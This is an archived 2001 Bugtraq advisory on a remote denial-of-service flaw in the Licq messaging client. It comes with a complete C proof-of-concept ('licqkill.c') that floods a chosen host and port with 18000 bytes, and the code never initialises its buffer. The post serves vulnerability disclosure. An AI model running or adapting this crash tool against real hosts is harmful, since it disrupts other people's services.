6120620 2001-02-20 16:19 -0500 /27 rader/ Stanley G. Bubrouski <stan@CCS.NEU.EDU>
Sänt av: joel@lysator.liu.se
Importerad: 2001-02-21 02:16 av Brevbäraren (som är implementerad i) Python
Extern mottagare: BUGTRAQ@SECURITYFOCUS.COM
Externa svar till: stan@CCS.NEU.EDU
Mottagare: Bugtraq (import) <15545>
Ärende: Advisory: Licq DoS +exploit
------------------------------------------------------------
Author: Stan Bubrouski (stan@ccs.neu.edu)
Date: February 20, 2001
Package: Licq
Versions affected: v.85 and v1.0.2 and possibly previous or newer versions.
Severity: Remote user's can cause Licq to crash or lock up completely.
Problems: While testing Licq back in December it became apparent to
me that Licq could be made to crash consistently if a certain amount
of data is sent to a port it is listening on. Further testing showed
that sending a certain amount of data to the port the Remote
Management Service (RMS) plugin listens on it too would cause Licq to
crash or lock up. The amount of data needed to be sent to crash Licq
may vary from system to system. On the Red Hat linux 7.0 system I
used 16707 or more bytes sent to the port Licq was listening on was
enough to crash it. Sending around 12000 or more characters to the
RMS plugin port was enough to crash Licq on my system as well. I've
attached a simple exploit to demonstrate the DoS. I haven't tested
any versions newer than 1.0.2 but they should be assumed vulnerable
as well.
Copyright 2001 Stan Bubrouski
--
Stan Bubrouski stan@ccs.neu.edu
316 Huntington Ave. Apt #676, Boston, MA 02115 (617) 377-7222
(6120620) --------------------------------(Ombruten)
Bilaga (text/plain) i text 6120621
6120621 2001-02-20 16:19 -0500 /68 rader/ Stanley G. Bubrouski <stan@CCS.NEU.EDU>
Bilagans filnamn: "licqkill.c"
Importerad: 2001-02-21 02:16 av Brevbäraren (som är implementerad i) Python
Extern mottagare: BUGTRAQ@SECURITYFOCUS.COM
Externa svar till: stan@CCS.NEU.EDU
Mottagare: Bugtraq (import) <15546>
Bilaga (text/plain) till text 6120620
Ärende: Bilaga (licqkill.c) till: Advisory: Licq DoS +exploit
------------------------------------------------------------
/*
* Name: Licqkill.c
* Author: Stan Bubrouski <stan@ccs.neu.edu>
* Date: December 26, 2000
* Description: Licq will crash when 16707 or more characters are sent to the port
* Licq is listening on. Finding the port Licq is running on is pretty
* simple because by default it starts using ports around 1100 or so. This
* has been tested against Licq v.85 and v1.0.2
* Purpose: Proof-of-concept tool for the Licq Denial of Service vulnerability.
*/
#include <netdb.h>
#include <netinet/in.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>
int main(int argc, char **argv)
{
char buf[18000];
int i, sock, result;
struct sockaddr_in sin;
struct hostent *hn;
printf("licqkill.c - Licq remote DoS by Stan Bubrouski
<stan@ccs.neu.edu>\n\n");
if (argc < 3)
{
fprintf(stderr, "Usage: %s <host> <port>\n", argv[0]);
exit(-1);
}
hn = gethostbyname(argv[1]);
if (!hn)
{
fprintf(stderr, "%s: host lookup failure\n", argv[1]);
exit(-1);
}
sin.sin_family = AF_INET; sin.sin_port =
htons(atoi(argv[2])); sin.sin_addr = *(struct in_addr
*)hn->h_addr; sock = socket(AF_INET, SOCK_STREAM, 0); result
= connect(sock, (struct sockaddr *)&sin, sizeof(struct
sockaddr_in));
if (result != 0)
{
fprintf(stderr, "Failed to establish connection to %s\n", argv[1]);
exit(-1);
}
if (sock < 0)
{
fprintf(stderr, "Socket error.");
exit(-1);
}
for (i=0; i<18000; i++)
strncat(buf, "A", 1);
send(sock, buf, sizeof(buf), 0);
close(sock);
fprintf(stdout, "Data sent\n\n");
}
(6120621) --------------------------------(Ombruten)